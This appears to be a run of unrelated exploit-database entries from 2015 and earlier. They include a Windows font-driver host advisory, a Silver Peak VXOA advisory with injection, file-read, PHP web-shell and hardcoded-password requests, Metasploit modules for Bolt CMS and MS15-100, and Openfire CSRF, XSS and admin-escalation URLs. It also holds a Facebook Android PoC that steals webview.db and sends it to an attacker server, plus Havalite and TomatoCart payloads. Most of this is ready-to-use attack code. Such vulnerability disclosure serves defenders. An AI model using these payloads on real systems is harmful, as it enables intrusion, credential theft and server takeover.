When a custom font is used in Windows 10 the User Mode Font Driver comes into play. This is initialized by a call from the kernel into the user sessions winlogon process which in turn spawns a new copy of fontdrvhost.exe. The process is started inside an appcontainer heavily restricting what resources it could access if a font bug was able to compromise it. However win32k exposes some additional calls to the UMFD for its own purposes, some of which are potentially dangerous. For that reason (presumably) winlogon creates the process with a specific DACL limiting access to the process and initial thread to SYSTEM only.
There’s a few problems with this approach, firstly it’s still running in the context of the user and includes the user’s environment variables such as PATH. This might mean if any badly written code later relies on the drive mapping or PATH there could be issues. More serious however is the specified DACL only applies to the process object and the initial thread object, but not to any subsequent thread. Therefore those threads get the default DACL from the process token (which is never changed) and are marked as owned by the current user, so the DACL could be rewritten anyway. This is a problem as with write access to the threads it’s possible to change their context and redirect execution to an arbitrary location. As the token is a lowbox token this can even be done in low integrity processes such as IE PM.
The exploitation is made trickier by the fact that you can’t directly read or write the process’ memory. Still one thing you could do is redirect the thread to LoadLibraryW and pass it the known address of a string. This can either be a string in a loaded library and rely on the path environment variable to allow it to be resolved or in something like the GDI heap.
Once in the UMFD process you can then send some of the specific Win32k escape codes. For example there’s one currently called UmfdEscEngCreateFile which will open (for read or write) a couple of files in system32. The open is done in kernel mode, with no forced access check (even though an impersonation is performed) and the handle returned to user mode. This is dangerous for a number of reasons, specifically that the NTFS driver will mark the file as having create symbolic link permissions because it’s opened in kernel mode which means the caller could set a file symbolic link. Then it could reopen the file and it would be able create an arbitrary file on disk. This hasn’t been completely tested however but it’s an example of a dangerous call, of course it could just be a vestigial feature which will be removed in release builds as the code is pretty dangerous and doesn’t even work as expected.
This issue could probably be fixed in a few ways, firstly the default token DACL should be set so that it maintains the security, assuming this is possible. Also you’d probably need to set OWNER_RIGHTS SID otherwise the user could just open the thread and rewrite its DACL. Also not using the actual user’s environment would probably be a good idea although not necessarily a complete fix. Finally presumably the process mitigation to only allow signed modules could be enabled which would complicate exploitation especially in the presence of CFG.
Proof of Concept:
I’ve provided a PoC which just crashes the fontdrvhost process at a predictable address. It’s only built for 32 bit version of Windows 10 but presumably it would work on 64 bit version as well. The password for the archive is "password".
1) Copy the PoC to a directory
2) Execute the PoC, if it wasn’t already a new instance of fontdrvhost.exe should have started. You might want to attach a debugger at this point.
3) Click the Do Exploit button, if at this point the fontdrvhost process doesn’t crash open a new copy of the PoC just to kick the threads inside the process.
Expected Result:
It’s not possible to influence the fontdrvhost process.
Observed Result:
Thread execution redirected to an arbitrary address of 0x55555555.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38198.zip
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Silver Peak VXOA Multiple Vulnerabilities
Affected versions: Silver Peak VX < 6.2.11
PDF:
http://www.security-assessment.com/files/documents/advisory/Silverpeak-Advisory-Final.pdf
+-----------+
|Description|
+-----------+
The Silver Peak VX virtual appliance running VXOA before version 6.2.11
contains a number of security vulnerabilities, including command
injection, unauthenticated file read, mass assignment, shell upload, and
hardcoded credentials. By combining these vulnerabilities, an attacker
may remotely obtain root privileges on the underlying host.
+------------+
|Exploitation|
+------------+
==Command Injection==
A user with administrative access to the REST JSON interface of the VX
web server may execute arbitrary commands on the operating system. The
injection point lies in the "snmp" call, which does not sanitise the
"auth_key" parameter before including it in an executed command string.
The following command injection PoC writes the user's id to a file on
the filesystem.
[Command Injection PoC]
POST /rest/json/snmp HTTP/1.1
Host: [HOST]
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 368
Cookie: connect.sid=[VALID];
{"access":{"rocommunity":"public"},"listen":{"enable":true},"traps":{"trap_community":"public","enable":true},"auto_launch":true,"sysdescr":"",
"syscontact":"","syslocation":"","v3":{"users":{"admin":{"hash_type":"sha","auth_key":"a;echo
`id` >
/var/tmp/cmd_inj","self":"admin","privacy_key":"","privacy_type":"aes-128","enable":false}}},"encAuth":false,"encPri":false}
==Unauthenticated File Read==
A user with the ability to access the VX web server interface may make
an unauthenticated call to a web interface function that allows them to
read arbitrary files on the disk with the permission of the web server
user "apache". Two functions are affected by this vulnerability,
"save_file.php" and "save_config_file.php".
[Unauthenticated File Read PoC]
curl -sk
"https://[HOST]/6.2.5.0_52054/php/save_file.php?ftype=log&fname=../../etc/passwd"
OR
curl -sk
"https://[HOST]/6.2.5.0_52054/php/save_config_file.php?filename=../../../../../../../../etc/passwd"
==Mass Assignment==
A user with access to the REST JSON interface of the VX web server may
alter undocumented parameters of the "users" call, allowing them to
change a user's login shell to bash. This can be used to evade the
limited subshell enforced by the SSH server on the appliance.
[Mass assignment PoC]
POST /rest/json/users HTTP/1.1
Host: [HOST]
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 366
Cookie: connect.sid=[VALID];
{"users":{"basic":{"self":"basic","enable":true,"gid":0,"password":"[SNIP]","shell":"/bin/bash"}},[SNIP
other users]}}
==Shell Upload==
A user with monitor or administrative access to the web interface of the
VX web server may upload a PHP shell in order to execute arbitrary
commands as the web server user "apache". A POST request containing the
PHP shell is made to the "configdb_file.php" endpoint. This uploads the
shell to a directory with a randomly generated name corresponding to the
user's SOAP interface session. This random value may be obtained from
"home.php", and the uploaded shell accessed within that directory. The
following PoC details uploading the shell, obtaining the SOAP directory
name, and using the shell.
[Shell upload PoC]
POST /6.2.5.0_52054/php/configdb_file.php?seenform=1 HTTP/1.1
Host: [HOST]
Cookie: PHPSESSID=[VALID];
Content-Type: multipart/form-data;
boundary=---------------------------18932870311933452824851992207
Content-Length: 301
-----------------------------18932870311933452824851992207
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: text/html
<?php
$cmd = $_GET["cmd"];
$output = shell_exec($cmd);
echo "$output";
?>
-----------------------------18932870311933452824851992207
#End of request
$curl -sk -b 'PHPSESSID=[VALID]'
"https://[HOST]/6.2.5.0_52054/php/home.php" | grep "flowFile"
var flowFile =
"/opt/tms/lib/web/content/webui/php/temp/soap/wcupfu36lkvkyutxc2h1swnxsnz8rsffijnhod9zmwr270oreuoatajxcfq71sf/";
$curl -sk
"https://[HOST]/6.2.5.0_52054/php/temp/soap/wcupfu36lkvkyutxc2h1swnxsnz8rsffijnhod9zmwr270oreuoatajxcfq71sf/shell.php?cmd=id"
uid=48(apache) gid=48(apache) groups=48(apache)
==Hardcoded Account==
The "spsadmin" account is predefined in the VX appliance, and is hidden
from user account lists in the web and subshell interfaces. The account
has a hardcoded password of "Silverpeak123", and cannot be logged into
through the regular web interface, or the subshell over SSH. However,
the account can log in via the web JSON interface, and execute JSON API
calls with administrative privileges. This can include creating new
users, with which an attacker may successfully log into the SSH or web
interfaces, and also exploiting the Command Injection bug detailed
earlier in this advisory. The following PoC details the request and
credentials used to obtain a valid REST cookie:
[Hardcoded account login PoC]
POST /rest/json/login HTTP/1.1
Host: [host]
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 46
{"user":"spsadmin","password":"Silverpeak123"}
==Subshell Breakout==
An administrative user with access to the enable menu of the login
subshell may enter a hardcoded string to obtain a bash shell on the
operating system.
[Subshell Breakout POC]
silverpeak > en
silverpeak # _spsshell
[admin@silverpeak root]# id
uid=0(admin) gid=0(root) groups=0(root)
+----------+
| Solution |
+----------+
Users of the 6.2.x branch should upgrade to version 6.2.11 of VXOA in
order to protect against these issues. Silver Peak has advised that
users of the 7.2.x branch are only vulnerable to the command injection
vulnerability, which will be patched in version 7.3.
+-------------------+
|Disclosure Timeline|
+-------------------+
01/04/2015 - Email sent to info address asking for a security contact.
09/04/2015 - Email sent to info and security addresses asking for a
security contact.
21/04/2015 - Email sent to CEO regarding security contact.
21/04/2015 - Response from CEO providing security contact details.
22/04/2015 - Email sent to security contact asking for PGP key.
22/04/2015 - Received PGP key, sent advisory.
22/04/2015 - Email received confirming receipt of advisory.
22/06/2015 - Email sent asking for update on advisory.
23/06/2015 - Vendor details fixes in place, states that all issues have
been fixed in 6.2.11.0, and only the command injection remains unfixed
in the 7.2.x version.
17/07/2015 - Email sent regarding resolution of unfixed issue.
17/07/2015 - Received response stating the command injection issue is
only relevant to customers who have disabled shell access.
21/07/2015 - Email sent asking for clarification on the vendor stance.
21/07/2015 - Vendor states command injection vulnerability is only an
issue for customers with shell access disabled as they otherwise have
the ability to execute commands through the shell, and that the issue
will be fixed in release 7.3.
09/09/2015 - Public advisory release.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognised companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'CMS Bolt File Upload Vulnerability',
'Description' => %q{
Bolt CMS contains a flaw that allows an authenticated remote
attacker to execute arbitrary PHP code. This module was
tested on version 2.2.4.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tim Coen', # Vulnerability Disclosure
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'References' =>
[
['URL', 'http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html']
],
'DisclosureDate' => 'Aug 17 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Bolt 2.2.4', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
OptString.new('FOLDERNAME', [true, 'The theme path to the web application (default: base-2014)', 'base-2014']),
OptString.new('USERNAME', [true, 'The username to authenticate with']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
], self.class)
end
def check
cookie = bolt_login(username, password)
return Exploit::CheckCode::Detected unless cookie
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'bolt'),
'cookie' => cookie
)
if res && res.code == 200 && res.body.include?('Bolt 2.2.4</b>: Sophisticated, lightweight & simple CMS')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def fname
datastore['FOLDERNAME']
end
def bolt_login(user, pass)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'bolt', 'login')
)
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
session_cookie = res.get_cookies
vprint_status("#{peer} - Logging in...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'bolt', 'login'),
'cookie' => session_cookie,
'vars_post' => {
'username' => user,
'password' => pass,
'action' => 'login'
}
)
return res.get_cookies if res && res.code == 302 && res.redirection.to_s.include?('/bolt')
nil
end
def get_token(cookie, fname)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
'cookie' => cookie
)
if res && res.code == 200 && res.body =~ / name="form\[_token\]" value="(.+)" /
return Regexp.last_match[1]
end
nil
end
def rename_payload(cookie, payload, fname)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'async', 'renamefile'),
'vars_post' => {
'namespace' => 'theme',
'parent' => fname,
'oldname' => "#{payload}.png",
'newname' => "#{payload}.php"
},
'cookie' => cookie
)
return true if res && res.code == 200 && res.body.include?('1')
nil
end
def exploit
vprint_status("#{peer} - Authenticating using #{username}:#{password}")
cookie = bolt_login(username, password)
fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
vprint_good("#{peer} - Authenticated with Bolt.")
token = get_token(cookie, fname)
fail_with(Failure::Unknown, 'No token found.') if token.nil?
vprint_good("#{peer} - Token \"#{token}\" found.")
vprint_status("#{peer} - Preparing payload...")
payload_name = Rex::Text.rand_text_alpha_lower(10)
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"form[FileUpload][]\"; filename=\"#{payload_name}.png\"")
data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"')
post_data = data.to_s
vprint_status("#{peer} - Uploading payload...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
)
fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302
vprint_good("#{peer} - Uploaded the payload.")
rename = rename_payload(cookie, payload_name, fname)
fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil?
php_file_name = "#{payload_name}.php"
payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name)
vprint_status("#{peer} - Parsed response.")
register_files_for_cleanup(php_file_name)
vprint_status("#{peer} - Executing the payload at #{payload_url}.")
send_request_cgi(
'uri' => payload_url,
'method' => 'GET'
)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
include Msf::Exploit::Remote::SMB::Server::Share
def initialize(info={})
super(update_info(info,
'Name' => "MS15-100 Microsoft Windows Media Center MCL Vulnerability",
'Description' => %q{
This module exploits a vulnerability in Windows Media Center. By supplying
an UNC path in the *.mcl file, a remote file will be automatically downloaded,
which can result in arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r',
],
'References' =>
[
['CVE', '2015-2509'],
['MSB', 'MS15-100']
],
'Payload' =>
{
'DisableNops' => true
},
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'false'
},
'Platform' => 'win',
'Targets' =>
[
['Windows', {}],
],
'Privileged' => false,
'DisclosureDate' => "Sep 8 2015",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),
OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe'])
], self.class)
deregister_options('FILE_CONTENTS')
end
def generate_mcl
%Q|<application run="#{unc}" />|
end
def primer
self.file_contents = generate_payload_exe
print_status("Malicious executable at #{unc}...")
print_status("Creating '#{datastore['FILENAME']}' file ...")
mcl = generate_mcl
file_create(mcl)
end
end
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-CSRF.txt
Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No CSRF tokens exists allowing us to take malicious actions against the
application.
1- change admin password.
2- add aribitrary users to the system
3- edit server settings e.g. turn off SSL.
4- Add rogue malicious clients with permit access (Allow all XMPP clients
to connect)
and more...
Exploit code(s):
===============
1) change admin password
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
<form id="HELL" action="http://localhost:9090/user-password.jsp"
method="post">
<input type="text" name="username" value="admin" >
<input type="text" name="password" value="abc123">
<input type="text" name="passwordConfirm" value="abc123" >
<input type="password" name="update" value="Update+Password" >
</form>
2) add aribitrary users
http://localhost:9090/user-create.jsp?username=hyp3rlinx&name=hyp3rlinx&email=blasphemer@abyss.com&password=abc123&passwordConfirm=abc123&create=Create+User
3) edit server settings & turn off SSL
http://localhost:9090/server-props.jsp?serverName=myserver&sslEnabled=false&save=Save+Properties
4) add rogue malicious clients
http://localhost:9090/plugins/clientcontrol/permitted-clients.jsp?all=false&other=http%3A//maliciouso.com/666.exe&addOther=Add
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST & GET
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] update, create, sslEnabled, other
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-XSS.txt
Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
===================
Persistent & Reflected XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
1) Persistent XSS exists when creating an Group Chat Bookmark, XSS will
execute each time victim accesses
the 'Group Chat Bookmarks' web page vuln parameter 'groupchatName' XSS will
be stored in 'ofbookmark'
table in 'bookmarkName' column of the MySQL DB and will be under
boomarkType as 'group_chat'.
2) Persistent XSS exists when creating URL Bookmarks, vuln parameter
'urlName' XSS will be stored in 'ofbookmark' table in
'bookmarkName' column of the MySQL DB will be under column boomarkType as
'url'.
3) Reflected XSS entry point exists in search parameter, script tags fail
but we can defeat using onMouseMove() JS function.
Exploit code(s):
===============
1) persistent XSS:
http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?type=group_chat
Inject <script>alert(666)</script> payload into the 'Group Chat Name' field
then click 'Create'.
2) persistent XSS:
http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?type=url
Inject <script>alert('HELL')</script> payload into the 'URL Name' field
then click 'Create'.
3) Reflected XSS:
http://localhost:9090/server-session-details.jsp?hostname=
"/><script>alert(666)</script>
4) Reflected XSS:
http://localhost:9090/group-summary.jsp?search="
onMouseMove="alert('hyp3rlinx')
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local & Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST & GET
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] groupchatName, urlName, hostname,
search
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-PRIV-ESCALATION.txt
Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
===================
Privilege escalation
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No check is made when updating the user privileges, allowing regular user
to become an admin.
Escalation can be done remotely too if user is logged in as no CSRF token
exist.
Exploit code(s):
===============
Become admin!
http://localhost:9090/user-edit-form.jsp?username=hyp3rlinx&save=true&name=blasphemer&email=ghostofsin@abyss.com&isadmin=on
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local or Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] isadmin
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
source: https://www.securityfocus.com/bid/57173/info
Facebook for Android is prone to an information-disclosure vulnerability.
Successful exploits allows an attacker to gain access to sensitive information. Information obtained may aid in further attacks.
Facebook for Android 1.8.1 is vulnerable; other versions may also be affected.
++++++ Attacker's app (activity) ++++++
// notice: for a successful attack, the victim user must be logged-in
// to Facebook in advance.
public class AttackFacebook extends Activity {
// package name of Facebook app
static final String FB_PKG = "com.facebook.katana";
// LoginActivity of Facebook app
static final String FB_LOGIN_ACTIVITY
= FB_PKG + ".LoginActivity";
// FacebookWebViewActivity of Facebook app
static final String FB_WEBVIEW_ACTIVITY
= FB_PKG + ".view.FacebookWebViewActivity";
@Override
public void onCreate(Bundle bundle) {
super.onCreate(bundle);
attack();
}
// main method
public void attack() {
// create continuation_intent to call FacebookWebViewActivity.
Intent contIntent = new Intent();
contIntent.setClassName(FB_PKG, FB_WEBVIEW_ACTIVITY);
// URL pointing to malicious local file.
// FacebookWebViewActivity will load this URL into its WebView.
contIntent.putExtra("url", "file:///sdcard/attack.html");
// create intent to be sent to LoginActivity.
Intent intent = new Intent();
intent.setClassName(FB_PKG, FB_LOGIN_ACTIVITY);
intent.putExtra("login_redirect", false);
// put continuation_intent into extra data of the intent.
intent.putExtra(FB_PKG + ".continuation_intent", contIntent);
// call LoginActivity
this.startActivity(intent);
}
}
++++++ Attacker's HTML/JavaScript file ++++++
<!--
attacker's app should put this file to /sdcard/attack.html in advance
-->
<html>
<body onload="doAttack()">
<h1>attack.html</h1>
<script>
// file path to steal. webview.db can be a good target for attackers
// because it contains cookies, formdata etc.
var target = "file:///data/data/com.facebook.katana/databases/webview.db";
// get the contents of the target file by XHR
function doAttack() {
var xhr1 = new XMLHttpRequest();
xhr1.overrideMimeType("text/plain; charset=iso-8859-1");
xhr1.open("GET", target);
xhr1.onreadystatechange = function() {
if (xhr1.readyState == 4) {
var content = xhr1.responseText;
// send the content of the file to attacker's server
sendFileToAttackerServer(content);
// for debug
document.body.appendChild(document.createTextNode(content));
}
};
xhr1.send();
}
// Send the content of target file to the attacker's server
function sendFileToAttackerServer(content) {
var xhr2 = new XMLHttpRequest();
xhr2.open("POST", "http://www.example.jp/";);
xhr2.send(encodeURIComponent(content));
}
</script>
</body>
</html>
source: https://www.securityfocus.com/bid/57169/info
Havalite CMS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
Havalite CMS 1.1.7 is vulnerable; other versions may also be affected.
http://www.example.com/?p=1 "comment" with value %E2%80%9C%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
source: https://www.securityfocus.com/bid/57156/info
TomatoCart is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and create files with arbitrary shell script which may aid in further attacks.
TomatoCart versions 1.1.5 and 1.1.8 are vulnerable.
POST /admin/json.php HTTP/1.1
Host: localhost
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo '<h1>0wned!</h1><pre>';+echo `ls+-al`; ?>